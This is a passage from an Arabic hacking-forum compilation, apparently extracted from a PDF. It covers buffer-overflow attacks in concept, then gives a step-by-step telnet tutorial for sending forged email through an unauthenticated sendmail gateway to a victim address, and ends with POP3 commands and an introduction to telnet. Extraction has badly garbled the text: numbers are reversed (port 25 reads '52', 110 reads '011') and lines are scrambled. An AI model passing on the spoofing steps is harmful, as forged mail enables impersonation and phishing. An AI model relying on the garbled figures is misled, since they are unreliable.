المستخدم أكبر حجما من الذاكرة التي خ ّصت لھذه‪     ‬‬ ‫ص‪                ‬‬ ‫البیانات‪ ،‬البیانات الزائدة ستفیض (‪ (overflow‬في الذاكرة التي بعد السم‪      ‬‬ ‫المتّغر؟ ھذا المكان من الذاكرة ھ و المكان الذي نستفید منه في الختراق‪ .‬ی‪    ‬‬ ‫ماذا نعمل في ذلك المكان‪ :‬داخل خط (مكان) البیانات التي يدخلھا المستخدم‬ ‫(في المثال السابق وھ و السم الول الذي يطلب من قبل البرنامج ثم أدخلناه‪ ‬‬ ‫) نضع الوامر الكثر شعبیة للحاسوب‪ ،‬حیث ھذه الوامر تجعل الحاسوب‪        ‬‬ ‫يحدث(ينتج) ھ یكل نستطیع استخدامه فیما بعد للقیام بالسیطرة الكاملة‪       ‬‬ ‫للنظام المستغ ّ‪ .‬القیام بھ ذا العمل لیس بیسطا كما يبدو لك‪ ،‬إذن لو أردت‪     ‬‬ ‫ل‪                                                              ‬‬ ‫معرفة كیف يعمل ‪ ،‬أنت يجب أن تقرأ المقالة القادمة حول ‪ ،Buffer Overflows‬‬ ‫‪                                       421‬‬ ‫الذي سیصف بالضبط كیف لستغلل واحده من الـ‪ Buffer Overflows‬في‪     ‬‬ ‫الختراق‪                                                              .‬‬ ‫اخیرا اتمنى انكم فھ متوا الدرس زين وعرفتوا ايش معنى ‪   Overflow Buffer‬‬ ‫واللي فھ م الدرس نص نص يعید قرائته اكثر من مرة مع التدقیق وانشاالله يفھم‬ ‫واذا فیه سؤال يتعلق بالدرس انا حاظر ويالیت ما تستبقون المور وتسألون‪    ‬‬ ‫أسأله عن طريقة الستغلل لني بأحط درس مثل ما قلت لكم يشرح التفاصیل‬ ‫قريبا انشاالله‪                                                           ‬‬ ‫‪                                521‬‬ ‫دراسة ‪                                BOF‬‬ ‫للكاتب‪                                                             Red Code :‬‬ ‫كتبت ھ ذا الموضوع قبل عده ايام في منتديات المدمر والن انقله ھنا بعد ان تم‬ ‫افتتاح المنتدي مجددا ( حمد الله علي السلمه )‪                              ‬‬ ‫طبعا انا اعتبر ھ ذا الموضوع ممیز لنه ل يتطلب من القاري اي فھم عمیق‪     ‬‬


‫للمعالجات او للغه السمبلي او لغه السي‪                                    ‬‬ ‫اتمني للجمیع الفائده والستمتاع وانتظروا قريبا مفاجاه من العیار الثقیل‪      ‬‬ ‫بخصوص كتابه الستثمارات لمن ليملك اي خبره برمجه او خلفیه عن طبیعه‪  ‬‬ ‫الثغرات حتي ذلك الوقت اخلیكم تمخمخون مع درسنا الیوم‪                    ‬‬ ‫بسم االله نبدا‪                                                                  ‬‬ ‫‪                                                      buffer over flow exploit‬‬ ‫ھو الداه رقم واحد في ايدي ھاكرز ھذه اليام ‪ ....‬قوي وسھل الستخدام‪    ‬‬ ‫ومنتشر ويشكل الخطر الكبر والوحید‪                                          ‬‬ ‫علي مشاريع ھذه اليام‪                                                       .‬‬ ‫ھناك اللف من الــ ‪unchecked buffers‬اللي تمكن الھكر من عمل ‪ overflow‬‬ ‫لھا‪                                                                           .‬‬ ‫ويمكنك التاكد من ذلك بمعرفه ان ‪ %07‬من نصائح ‪ CERT‬صدرت للتعامل مع‪   ‬‬ ‫ھذه المشكله ‪ .‬والمشكله‪                                                     ‬‬ ‫الكبر ان الستثمارات لھذا النوع من الثغرات سھله الستخدام لدرجه ان‪      ‬‬ ‫الطفال ممكن ينفذونھا بدون اي مشاكل لنه‪                                 ‬‬ ‫ليحتاج الي اي خبره تقنیه لتنفیذ ھ ذه الكواد ‪ .‬وقوي جدا لنه في كثیر من‪   ‬‬ ‫الحالت ينفذ الكود كــ ‪ ROOT‬ومن ثم امكانیه‪                                  ‬‬ ‫تنفیذ اي شي يخطر علي بالك‪                                               .‬‬ ‫الــ ‪unchecked buffer‬يسمح بعمل ‪ buffer overflows‬كیف ؟‪                 ‬‬ ‫يحدث الــ ‪unchecked buffer‬عندما يقوم مبرمج التطبیق باھمال حجم البیانات‬ ‫‪ .‬في معظم لغات البرمجه‪                                                      ‬‬ ‫يعین حجم ثابت للــ ‪ buffer‬لیخزن البیانات ‪ .‬نظريا المبرمج يعین حجم مناسب‪ ‬‬ ‫وكافي كا ‪ buffer‬لتخزين البايانات‪                                              ‬‬ ‫دعونا نعطي مثال يوضح الفكره اكثر‪                                           .‬‬ ‫لنفرض انك يامن تقرا ھ ذه الكلمات مبرمج وتريد كتابه ‪ routine‬لدخول‪          ‬‬ ‫المستخدمین في تطبیق تعمل علیه ‪ ,‬طبعا‪                                   ‬‬ ‫سوف يستقبل اسم المستخدم وكلمه المرور من المستخدمین ومن ثم يحدد‬ ‫‪                                      621‬‬ ‫ھل يسمح له بالدخول ام ل ‪ .‬من اول الشیاء التي يجب‪                    ‬‬ ‫علیك تعیینھا كم المساحه التي سوف تخصصھا للــ ‪buffer‬المستخدم لسم‪ ‬‬ ‫الیوزر والباسورد ‪ .‬وفي النظام الذي تعمل علیه‪                              ‬‬ ‫الطول القصي لسم المستخدم ‪ 23‬خانه ‪ .‬قررت تحديد ‪ 001‬خانه لذاكره‪     ‬‬ ‫الـ ‪buhffer‬والتي تعتبر اكثر من كافیه‪                                           ‬‬ ‫لحفظ اطول اسم مستخدم واعتقدت بشكل خاطي ان الــ ‪routine‬آمن لن‪    ‬‬ ‫حجم الــ ‪buffer‬اكبر بكثیر من‪                                                  ‬‬ ‫‪23‬خانه التي يدخلھا المستخدمین افتراضیا لكن بما انك اھملت التدقیق‪     ‬‬ ‫المتعلق بفحص المدخلت قبل نسخھا الي الـ ‪                        buffer‬‬ ‫فھذا يعني ان الــ ‪routine‬ھذا في التطبیق اللي تبرمجه يمكن استثماره فكل‪ ‬‬ ‫مايلزم المھاجم ھو ارسال اكثر من ‪ 001‬خانه‪                                 ‬‬ ‫وتمكن من عمل‪                                            buffer over flow .‬‬ ‫الن دعنا نتكلم عن الستثمار ففي ابسط الحالت عند عمل ‪buffer over flow‬‬ ‫للتطبیق يحطمه ‪                                                        crash‬‬ ‫ويوقفه عن العمل وبذلك يكون قد نجح ھجوم حجب الخدمه علي تطبیقك ‪DOS‬‬ ‫‪.‬وفي معظم الحالت يقوم المھاجم ببناء‪                                      ‬‬ ‫المدخلت التي سوف يرسلھ ا للتطبیق بحیث يتمكن من تطبیق اوامر محدده‪ ‬‬ ‫علي نظامك ھ ذه الوامر ممكن ان تكون اي شي‪                            ‬‬ ‫مثل عمل فورمات للھ ارد دسك او سرقه بیانات او تركیب باب خلفي او اي شي‬ ‫اخر ‪                                                                           .‬‬ ‫دعونا نوضح اكثر‪                                                              :‬‬ ‫برامج الكمبیوتر تنظم علي شكل ‪ subroutines .‬للبرنامج ‪ routine‬رئیسي‪    ‬‬


‫(‪(main‬يقوم‪                                                                  ‬‬ ‫باستدعاء الــ ‪subroutines‬والتي تنفذ تعلیمات محدده ‪ function‬ومن ثم تعید‪ ‬‬ ‫التحكم مره اخره الي ‪                                                   main‬‬ ‫الــ ‪subroutines‬لتقوم بعملھا علیھ ا تخزن بیانات مختلفه وتستخدم لذلك‪      ‬‬ ‫منطقه معینه من الذاكره تسمي ‪                                       stack‬‬ ‫لتخزين ھذه البیانات ‪ .‬ھذه البیانات من ضمنھا عنوان في الذاكره ‪    memory‬‬ ‫‪address‬الذي يقوم الــ‪                                            subroutines‬‬ ‫باعاده التحكم الیه بعد ان ينجز المھ مه التي برمج من اجلھا ‪ .‬كذلك‪          ‬‬ ‫الــ ‪Subroutines‬يخزن بیانات موقته التي نسمیھا‪                            ‬‬ ‫‪buffer‬في الــ ‪stack‬في كل مره ينفذ فیھ ا والذاكره المطلوبه يتم تحديدھا في‬ ‫الــ ‪stack‬في وحده قیاس تسمي‪                                              ‬‬ ‫‪stack frame .‬الــ ‪stack frame‬يحتوي علي مساحه لي ‪ buffer‬ممكن يحتاجه‬ ‫‪                                     721‬‬ ‫الــ ‪ subroutine‬كذلك عنوان اعاده التحكم ‪ return address‬الي الــ ‪     routine‬‬ ‫الساسي والذي قام اساسا باستدعاء ھذا‪                                    ‬‬ ‫الـــ ‪subroutine .‬بعد ان يقوم الــ ‪subroutine‬بانھاء عمله يعید التحكم الي‪      ‬‬ ‫الــ ‪                                                                     routine‬‬ ‫الذي قام باستدعائه بالقفز مباشره الي عنوانه الموجود في الــ ‪  stack frame‬‬ ‫ومن ثم يتم حذف الــ ‪                                               stack frame‬‬ ‫میكانیكیه الداء ھ ذه تعمل بشكل رائع حتي يحدث الــ ‪buffer overflows .‬اذا‪   ‬‬ ‫ارسلنا ‪ 005‬خانه الي ‪                                              stack buffer‬‬ ‫مخصص لـ ‪ 001‬خانه نكون بذلك قد قمنا بالكتابه فوق ‪ 004‬خانه علي الذاكره‪    ‬‬ ‫المجاوره للـ ‪stack frame‬مما يعني اننا كتبنا فوق عنوان‪                         ‬‬ ‫العاده وكذلك ‪ buffers‬اخري‪                                                     ‬‬ ‫الن في ھذه الحاله عندما يحاول الــ ‪subroutine‬اعاده التحكم الي ‪       main‬‬ ‫سوف يقفز الي العنوان المحدد في الـ ‪                             stack frame‬‬ ‫والذي قمنا قبل قلیل بالكتابه علیه عن طريق ‪ overflowed buffer‬مالذي‪       ‬‬ ‫يحدث الن ؟‪                                                                    ‬‬ ‫عندما يحاول البرنامج ان يقفز الي عنوان غیر موجود ببساطه يتحطم ‪   crash .‬‬ ‫الن لنري كیف تكون الحلول الذكیه‪                                               ‬‬ ‫والكثر مھاره ‪ .‬عند ارسال ‪ 005‬خانه مختاره بعنايه يستطیع المھاجم التحكم‪    ‬‬ ‫بالــ ‪                                                             return address‬‬ ‫بدل الذھ اب الي عنوان غیر موجود وتحطیم البرنامج يقوم بتوجیه البرنامج للقفز‪ ‬‬ ‫الي عنوان كود الستثمار ‪ exploit‬وتنفیذه‪                                      ‬‬ ‫وقبل ھذا يجب علي المھاجم تنفیذ مھمتین‪                                   ‬‬ ‫الولي ‪ :‬عمل ‪ load‬للكود الذي ينوي استخدامه‪                                ‬‬ ‫الثانیه ‪ :‬تنفیذ ھذا الكود اي تشغیله‪                                             ‬‬ ‫طبعا الــ ‪stack buffer‬يقوم بانجاز كل المھمتین ‪ .‬يقوم المھاجم بارسال سلسه‬ ‫حرفیه طويله كمدخلت للبرنامج‪                                                  ‬‬ ‫وتحتوي ھ ذه السلسه علي الكود المراد تنفیذه وكذلك عنوانه بالذاكره ‪ .‬عندما‪ ‬‬ ‫يحدث الــ ‪overflows‬يتم عمل ‪                                              load‬‬ ‫للكود المرسل في الــ ‪stack memory‬وكذلك الـ ‪return address‬للــ ‪subroutine‬‬ ‫يتم‪                                                                            ‬‬ ‫الكتابه علیه وتغییره لیصبح عنوان الكود المراد تنفیذه ‪ .‬ھكذا عندما ينھي‪       ‬‬ ‫الــ ‪subroutine‬عمله يقفز الي عنوان‪                                           ‬‬ ‫كود المھ اجم فینفذ الكود ‪ .‬الن الكود كما قلنا قد يفرمت الھ ارد وممكن يركب‪    ‬‬ ‫‪                                      821‬‬ ‫باك دور وممكن يھ اجم بقیه الشبكه ببساطه يمكن‪                          ‬‬ ‫ان يكون الكود اي شي يمكن ان ينفذه الشخص علي نظامه ‪ .‬لكن سماحیات‬ ‫البرنامج المخترق تحدد بشكل كبیر اي نوع من الھجمات‪                    ‬‬


‫يمكن ان تطبق علیه ‪ .‬فمثل اذا كان البرنامج يعمل ‪ root‬فیمكن تنفیذ اي امر‪ ‬‬ ‫مھما كان ‪ ,‬وكلما قلت الصلحیات قلت اخطار الھجوم‪                        ‬‬ ‫ھناك مايسمي بالــ ‪ Entercept‬يحتوي علي تكنولوجیا محمیه تمكنه من منع‪ ‬‬ ‫تنفیذ البرامج في حاله ‪                                            overflows‬‬ ‫و يعتبر حل امني قوي وموثوق ولكن للسف لیس خیرا جیدا لنظمة النتاج‪   ‬‬ ‫ويسبب اشكالیه عند محاوله تركیب باتشات الرقع المنیه‪                   ‬‬ ‫­­­­­­­­­­­­­‪                                                                 ‬‬ ‫خلصه الموضوع‪                                                             :‬‬ ‫‪1‬يعتقد الكثیرون ان ھذا الھجوم حالیا ليطبق ال علي البرمجیات الضعیفه‪   ‬‬‫والغیر مھمه وھ ذا اكبر خطا ممكن ان الشخص ممكن يرتكبه‪                 ‬‬ ‫قال لي يومااا احد محترفي امن المعلومات ‪    Buffer overflow exploits are‬‬ ‫‪                                                                here to stay‬‬ ‫ويقصد ان الھجوم ھ نااااا لیبقي طويلااااااا لسببین ‪:‬لن الكمال الله ولن‪       ‬‬ ‫المبرمجین لن يعملوا مجددا اذا كتبوا برنامجا ل يعید الزبون الیھم‪             ‬‬ ‫ومن وجه نظري انه ليوجد برنامج واحد كبیر ول صغیر يعمل ‪checked buffers‬‬ ‫كامل ‪                                                                       .‬‬ ‫اضافه ان ھناك عامل نفسي عند المبرمجین يدفعھم للخطاء سواء بوعي او‪ ‬‬ ‫بغیره كسلوك احترازي اذا تمكن الشخاص من استخدام مافعلوه‪            ‬‬ ‫ونسوھم فتجد في ال وعي عندھ م عباره عندما استطیع بناء قصر ول يمكنني‬ ‫ان اسكنة فانا اعرف كیف ادمره امزح بالخیره‪                              ‬‬ ‫واخیرا‪                                                                       :‬‬ ‫الھجوم منتشر سھل وقوي ‪ ........‬مع تحیاتي‪                               ‬‬ ‫‪                                   921‬‬ ‫ماھو ‪                              Send Mail‬‬ ‫للكاتب‪                                                                   IcEr:‬‬ ‫السلم علیكم و رحمة االله و بركاته ‪                                          ):‬‬ ‫موضوع الیوم ھو شرح ل‪ send mail‬و ھ و مترجم من احد المواضیع الجنبیه‪     ‬‬ ‫قراتھا و حبیت اترجمھا لكم ‪                                                  ):‬‬ ‫المھم خلینا نشوف ايش ال ‪ sendmail‬ھذا‪                                    ‬‬ ‫‪ sendmail‬عباره عن ديمون و ھو يعمل على البورت ‪ 52‬و يعمل على ارسال‪    ‬‬ ‫اليمیلت‪                                                                       ‬‬ ‫(رسائل صادره)‪                                                                ‬‬ ‫مثل ‪...‬مقدم الخدمه لديك قد يستعمل ملقمین لل ‪                   sendmail‬‬ ‫الول الصادر مثل ‪ mailgw.xxxxx.com‬و ھو على البورت ‪                     52‬‬ ‫و الثاني الوارد مثل ‪ mail.xxxxx.com‬و ممكن يعمل على البورت ‪           011‬‬ ‫بالنسبه للوارد فھ و قد يحتاج الى كلمه سر و يوزرنیم ‪....‬لذلك ليمكنك ان ترى‪ ‬‬ ‫الرسائل الوارده ‪                                                             ):‬‬ ‫لكن ‪ ):‬و يالعجب ‪..‬فان الملقم ‪ mailgw.xxxxx.com‬ل يحتاج لكلمه سر و‪       ‬‬ ‫لاسم مستخدم‪                                                               ‬‬ ‫مامعنى ھذا؟؟؟؟معناه انك اذا دخلت ال‪ telnet‬و شبكت مع‪                     ‬‬ ‫‪ mailgw.xxxxx.com‬على البورت ‪ 52‬و استعملت‪                              ‬‬ ‫اوامر ال ‪ telnet‬فانه يمكنك ان ترسل رسائل ‪                     (: fake email‬‬ ‫ايه رايك؟؟؟‪                                                                    ‬‬ ‫تعال نشوف ازاي نرسل مثل ھ ذه الرسايل و كمان ;) ممكن تخترق موقع‪      ‬‬ ‫يشغل برنامح ال ‪<< sendmail‬بس ل تستعجل‪                               ‬‬ ‫كما قلنا فانه يمكن ان ترسل ايمیلت من خلل ملقم الرسائل الصادره حیث انه‬ ‫ل يتطلب اي اشتراك‪                                                           ‬‬ ‫اذن فكل المطلوب ھ و الي بي حق السیرفیر او الھوست نیم و اوامر التلنت‪    ‬‬ ‫المستخدمه في ال‪                                                  sendmail‬‬ ‫‪                                                             <======start‬‬


‫‪          remote system<======connect<====telnet<======run‬‬ ‫‪      mailgw.xxxxx.com‬‬ ‫‪m‬‬ ‫في الھوست نیم اكتب الملقم للرسائل الصادره مثل‬ ‫‪                                             connect‬‬ ‫‪c‬‬ ‫و في البورت اكتب ‪ 52‬ثم‬ ‫كده‪                                                     ‬‬ ‫ممكن تلقي حاجه زي ه‬ ‫‪                                      031‬‬ ‫‪   alpha.xxxxx.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999 220‬‬ ‫‪                                                   .(GMT) 21:46:04 +0000‬‬ ‫ذا؟؟؟؟‪                                                               ‬‬ ‫؟‬ ‫ايش ھ‬ ‫ال‪      ‬‬ ‫ھذا ما يسى بالبانار و ھو عاده يحتوي عن بعض المعلومات عن اصدار ل‬ ‫على‪                                            ‬‬ ‫‪ program sendmail‬الموجود ى‬ ‫اصدار‪  ‬‬ ‫ر‬ ‫السرفر ‪...‬على فكره ‪...‬البانار ده مھم للھ اكر لنه عن طريقه بیحدد اي‬ ‫موجود‪                                                      ‬‬ ‫د‬ ‫ال‪sendmail ‬‬ ‫من ل‬ ‫كان‪ Sendmail ‬‬ ‫و ده حیفیده في حاجات كتیره ‪!!!..‬الصدار في المثال السابق ن‬ ‫‪                                                                ;8.8.6/8.9.3‬‬ ‫نشوف‪                                              : ‬‬ ‫ف‬ ‫المر‪ help ‬و‬ ‫ر‬ ‫تعال نكتب‬ ‫‪                                        This is Sendmail version 8.9.3­214‬‬ ‫‪                                                                :Topics­214‬‬ ‫‪                                      HELO EHLO MAIL RCPT DATA ­214‬‬ ‫‪                                      RSET NOOP QUIT HELP VRFY ­214‬‬ ‫‪                                               EXPN VERB ETRN DSN ­214‬‬ ‫‪                                 ."<topic> HELP" For more info use­214‬‬ ‫‪               To report bugs in the implementation send email to­214‬‬ ‫‪                                      .sendmail­bugs@sendmail.org ­214‬‬ ‫‪       .For local information send email to Postmaster at your site­214‬‬ ‫‪                                                      End of HELP info 214‬‬ ‫التالي‪                                     ‬‬ ‫ي‬ ‫ماشي ‪....‬سیبك من ده ‪....‬اكتب‬ ‫‪                                      <fake Email address> :MAIL FROM‬‬ ‫تضغط‪ shift + ctrl ‬شمال لترى المر جیدا ‪....‬اكتبه كما ھو بالقواس و بدل‬ ‫ل‬ ‫ط‬ ‫لزم‬ ‫‪                                                         email address fake‬‬ ‫حاجه‪...‬مثل‪                icer@AoEgH.org ‬‬ ‫ل‬ ‫اكتب اليمیل الذي تريده ‪...‬اي‬ ‫كده‪                                                          : ‬‬ ‫حتلقي الرد ه‬ ‫‪                                        icer@AoEgH.com... Sender ok 250‬‬ ‫التالي‪                                                            ‬‬ ‫ي‬ ‫اكتب المر‬ ‫‪                                                     <recipient> :RCPT TO‬‬ ‫ال‪ recipeint ‬اكتب ايمیل المرسل الیه ‪...‬يجب ان تجصل على رساله تقول‬ ‫ل‬ ‫بدل ل‬ ‫‪                                   victim@victim.com... Recipient ok 250‬‬ ‫‪                                    131‬‬ ‫و‪                          victim@victim.com ‬‬ ‫لو كان ايمیل المرسل الیه ھو‬ ‫مرات‪        ... ‬‬ ‫ت‬ ‫المھ م‪...‬ممكن تبعت لكتر من ايمیل ببساطه بتكرار المر عده‬ ‫كده‪                                                          data ‬‬ ‫اكتب بعد ه‬ ‫‪                           on a line by itself "." Enter mail, end with 354‬‬ ‫كالتالي‪                                                 ‬‬ ‫ي‬ ‫اكتب الرساله و لتكن‬ ‫تريده‪                       ( ‬‬ ‫ه‬ ‫‪( Subject: fake message‬اكتب اي عنوان انت‬ ‫‪                                     .Hello. This is a fake Email message‬‬ ‫‪                                                                  .I'm bored‬‬ ‫‪                                               !!Gimme something to hack‬‬ ‫كده‪                                                     ‬‬ ‫لزم تلقي حاجه زي ه‬ ‫‪                           CAA15313 Message accepted for delivery 250‬‬ ‫ى‪                message ID ‬‬ ‫فیه رقم موجود بجانب ال ‪ 052‬ھذا الرقم يسمى‬ ‫الله‪                              (: ‬‬ ‫>>>>كده يبقى الرساله اتبعتت و الحمد ه‬


‫روح‬..... ‫لو انت كنت بعت الرساله الى ايمیل لك‬... ‫تعالى نشوف حاجه تانیه‬                                     header ‫ھناك و افتح الرساله و شوف ال‬                                                 : ‫حتلقي الكلم ده‬..... ‫بتاعھا‬              Received: from alpha.netvision.net.il (alpha.netvision.net.il    cmx.netvision.net.il (8.9.3/8.9.3) with ESMTP id [194.90.1.13]) by Sat, 10 Jul 1999 02:49:59 +0300 ;<victim@victim.com CAA15313 for                                                                        ((IDT                                                     From: icer@AoEgH.com  Received: from some.hostname.crap.com (some.hostname.crap.com                                     132       alpha.xxxxxx.com (8.9.3/8.8.6) with SMTP id [62.0.146.225]) by   Jul 1999 02:55:46 +0300 10 ,CAA15313 for victim@victim.com; Sat                                                                                             ((IDT                                   (Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT           <CAA15313@alpha.xxxxx.com .199907092355> :Message­ID X­Authentication­Warning: alpha.xxxxx.com: some.hostname.crap.com                                          didn't use HELO protocol [[62.0.146.225                                                                          Subject: Fake mail                                                                                           :Status                                                                    X­Mozilla­Status: 8001                                                           X­Mozilla­Status2: 00000000                                                             X­UIDL: 3752da3b000002ff                                                            : ‫تعال نشوف الجزا الول كمثال‬   Received: from alpha.xxxxx.com (alpha.xxxxx.com [194.90.1.13]) by  Sat, 10 ;< with ESMTP id CAA16970 for (8.9.3/8.9.3) cmx.xxxxx.com                                                      (GMT) Jul 1999 02:49:59 +0000                                             ([alpha.xxxxx.com [194.90.1.13) ‫اھااااا‬      whois alpha.xxxxx.com ‫لو عندنا يونیكس و كتبنا المر ده في التیرمینال‬                                   <<<< samspade ‫او من الويندوز باستخدام الداه‬   sub­server ‫ اي انھا عباره عن مايسمى‬xxxxx.com ‫سنجد انھا تتبع الموقع‬                                                                            .. ‫لرسال اليمیلت‬         ............................................................................................           ‫كیف يمكنك ان تخترق موقع به برنامج ال‬..... ‫الموضوع لم ينتھ ي بعد‬                                                                                 <<<sendmail                                              ‫ان شاء االله اترجمه ان كان في العمر بقیه‬                                               133                            3POP ‫ماھو‬                                                   KING_ABDO:‫للكاتب‬                                                            ‫؟‬3 pop ‫ما ھو الـ‬                                                        =­=­=­=­=­=­=­=­                                             pop = Post Office protocol web­based ‫ھو بروتوكول يستخدم لستعمال أي بريد غیر البريد من نوع ال‬                                                                    Email ‫ھو أي بريد ل يمكن استخدامه ال عبر موقع معین حیث‬ web­based Email                                                                    ‫سوف‬    ‫يحتوي ھذا الموقع على العديد من العلنات التي تستفید منھا الشركة‬                                                                  ‫المزودة‬                                                              ‫للبريد ماديا‬   ‫و أي بريد آخر ھ و الذي يمكن الدخول الیه و استخدامه عبر أي أداة للبريد‬                            : ‫و ھ و يستخدم نوعین من البروتوكولت و ھما‬


‫‪                               SMTP = Simple Mail Transfer Protocol‬‬ ‫‪                                           POP = Post Office Protocol‬‬ ‫كل ما تحتاجه ھو عمیل تلنت و ھو موجود في نظام تشغیل وندوز‪         ‬‬ ‫و الن سوف نتصل بملقم خدمة ‪ pop‬و كثیرا ما يكون بھذاالشكل‪           ‬‬ ‫‪                                                         mail.xxx.com‬‬ ‫اذا كان الموقع ھو ‪                                       www.xxx.com‬‬ ‫سوف نتصل بالملقم عبر المنفذ رقم ‪ 011‬و ھو المنفذ الفتراضي‪           ‬‬ ‫‪                                431‬‬ ‫في نظام وندوز اتبع التالي‪                                                  ‬‬ ‫‪                                                                         start‬‬ ‫|‪                                                                             ‬‬ ‫‪                                                                          run‬‬ ‫|‪                                                                             ‬‬ ‫اكتب ‪                                            telnet mail.xx.com 011 :‬‬ ‫و بدل ‪ xx‬بعنوان الموقع‪                                                     ‬‬ ‫سوف تفتح نافذة التلنت و عندما يتم التصال سوف يظھر التالي ‪           :‬‬ ‫‪                             +OK POP3 [183.90.5.0] v7.60 server ready‬‬ ‫و الن سوف نقوم بتعريف أنفسنا للملقم عبر تزويده باسم المستخدم و كلمة‬ ‫السر الخاصین ببريدك فنقوم بكتابة المر التالي لتزويده باسم المستخدم ‪  :‬‬ ‫‪                                                             user username‬‬ ‫سوف يظھر العبارة التالیة ‪                                                 :‬‬ ‫‪                             +OK User name accepted, password please‬‬ ‫و ھ نا يطلب منك كلمة السر الخاصة باسم المستخدم الذي أدخلته فنقوم‪   ‬‬ ‫بكتابة‪                                                                        ‬‬ ‫المر التالي لتزويدة بكلمة السر ‪                                           :‬‬ ‫‪                                                      pass your­password‬‬ ‫اذا كانت المعلومات المعطاه صحیحه سوف يظھر التالي ‪                    :‬‬ ‫‪                                          +OK Mailbox open, x messages‬‬ ‫حیث ‪ x‬ھو عدد الرسائل الموجودة في البريد‪                                ‬‬ ‫أما اذا كانت المعلومات غیر صحیحة ‪                                        :‬‬ ‫‪                                   531‬‬ ‫‪                                                        ­ERR Bad login‬‬ ‫و الن نقوم بكتابة المر ‪ list‬لكي نري قائمة بالرسائل الموجودة و عندھا‪    ‬‬ ‫سوف نحصل على سطر واحد فقط يحتوي على رقم الرسالة و على حجمھا‬ ‫و إذا أردنا قراءة رسالة فنقوم بكتابة المر ‪                           retr x‬‬ ‫حیث ‪ x‬ھو رقم الرسالة و عندھا سوف نرى الرسالة بكاملھا‪               ‬‬ ‫و اذا أردنا مسح رسالة نقوم بكتابة المر ‪                           dele x‬‬ ‫حیث ‪ x‬ھو رقم الرسالة‪                                                  ‬‬ ‫و عندما تنتھ ي و تريد الخروج كل ما علیك فعله ھ و أن تكتب المر ‪      quit‬‬ ‫في النھ اية يجب أن تعرف أنه عندما تقوم بالدخول الى بريدك يتم انشاء ملف‬ ‫‪  lock file‬و يتم مسحه عندما تخرج من البريد و ذلك حتى ل يسمح لحد بأن‬ ‫يدخل الى البريد و أنت تستخدمه ‪                                       .‬‬ ‫‪                                 631‬‬ ‫ماھو التلنت‪                                     ‬‬ ‫للكاتب‪ :‬محمد قطان‪                                                                  ‬‬ ‫‪ Telnet‬كان ومازال الداة المفضلة لمخترقي المواقع ( الھ كرز ) ‪ ....................‬‬ ‫ماھو ال ‪ Telnet‬؟؟؟؟؟؟؟؟؟؟ وما استخداماته ؟؟؟؟؟ كل شي بالتفصیل‪          ‬‬ ‫‪                                                                           ...............‬‬ ‫يعتبر ‪ Telnet‬بروتوكول من بروتوكولت ‪ TCP/IP‬للتصال بأجھزة الكمبیوتر البعیدة‬ ‫‪ ,‬كما أنه تطبیق‪                                                                       ‬‬


‫من تطبیقات ‪ TCP/IP‬يتم استخدامه في تشغیل برامج ‪ Telnet‬لكي يتم‪         ‬‬ ‫استخدام جھ از الكمبیوتر بطريقة‪                                                      ‬‬ ‫فعالة كما لو كنت تجلس أمامه ‪                                                      .‬‬ ‫كیف يتم التصال ؟؟؟؟؟‪                                                                ‬‬ ‫يتم التصال باستخدام تطبیق ال ‪ Telnet‬الموجود على الوحدة التابعة ( الجھاز‪ ‬‬ ‫المتصل ) بالتصال بتطبیق ‪                                                    Telnet‬‬ ‫الموجود على وحدة الخدمة ( الجھاز الھدف ) وعادة ما يكون ‪ Telnet Daemon‬‬ ‫‪                                                                        ..................‬‬ ‫يبدأ التصال من تطبیق الوحدة التابعة ( على جھاز الكمبیوتر المحلي المتصل )‬ ‫====== إلى البروتوكول‪                                                            ‬‬ ‫(الموجود أيضا على جھاز الكمبیوتر المحلي المتصل ) ===== ثم ينتقل على‬ ‫شبكة التصال ======‪                                                             ‬‬ ‫إلى بروتوكول ‪ ) Telnet‬الموجود على جھاز الكمبیوتر البعید ) ==== ثم إلى‪   ‬‬ ‫خدمة‪                                                                                  ‬‬ ‫‪ ) Telnet‬على جھاز الكمبیوتر البعید ) وھو طبعا الجھاز الھدف ‪           ..........‬‬ ‫وھنا يعمل تطبیق ‪ Telnet‬كبرنامج محاكاة ‪ ,‬ويتم إرسال أية أوامر يقوم المتصل‪ ‬‬ ‫بكتابتھا عبر الشبكة لكي‪                                                             ‬‬ ‫يتم تنفیذھا من قبل جھ از الكمبیوتر البعید ‪                                     ......‬‬ ‫علما أن ال ‪ Telnet Daemon‬يستمع على المنفذ ‪ 32‬في انتظار التصال به ‪   .‬‬ ‫‪                                            731‬‬ ‫خدمات ال ‪                                                             : Telnet‬‬ ‫‪ -1‬يمكنك استخدام ال ‪ Telnet‬كمتصفح ويب لي موقع ‪ ,‬ولكنه سیعرض لك‪    ‬‬ ‫مصدر الصفحة حصرا أي‪                                                         ‬‬ ‫ال ‪ Source‬للصفحة ‪ ,‬وذلك لن خدمة ال ‪ Telnet‬كانت ُستخدم عندما كانت‪   ‬‬ ‫ت‪                        ‬‬ ‫مواقع النترنت‪                                                                     ‬‬ ‫مجرد نصوص ‪                                                              .......‬‬ ‫‪ -2‬ويمكن استخدام ال ‪ Telnet‬أيضا ك ‪ Client FTP‬فھو يعمل عمل ‪  Gute FTP‬‬ ‫تماما وذلك‪                                                                         ‬‬ ‫باستخدام أوامر يتم إدخالھا من خلل ال ‪                         ........ Telnet‬‬ ‫‪ -3‬ويمكنك من خلل ال ‪ Telnet‬أيضا تصفح اليمیل ‪ POP Mail‬وقراءة رسائلك‪   ‬‬ ‫الواردة وارسال ما تريد‪                                                           ‬‬ ‫من رسائل ‪ ,‬وھ ذا طبعا اذا كان اليمیل من نوع ‪                      POP Mail‬‬ ‫وھو اختصار ل ‪ ........ Post Office Protocol‬طبعا يختلف عن ايمیل الويب‪       ‬‬ ‫المستخدم حالیا‪                                                                 ‬‬ ‫مثل ‪ Yahoo‬و ‪                                                   ...... Hotmail‬‬ ‫ومن المواقع التي تقدم مثل ھذه الخدمة مثل ‪   /http://www.hotpop.com :‬‬ ‫كما أن ل ‪ Telnet‬خدمات أخرى ل حاجة لذكرھا ھنا لن معظمھا أصبح قديما‪   ‬‬ ‫وربما عديم الفائدة‪                                                               ‬‬ ‫نوعا ما ‪                                                                  ...........‬‬ ‫تشغیل ‪ Telnet‬وضبط إعداداته ‪                                               :‬‬ ‫يمكنك تشغیل ‪ Telnet‬من ‪ ==== Start === Run‬ثم نكتب ‪  ......... Telnet‬‬ ‫كما يمكنك تشغیله من متصفح === اذھب الى الكسبلورر و اكتب ‪///:telnet‬‬ ‫ولضبط إعداداته حتى يعمل بشكل صحیح نقوم بالتالي 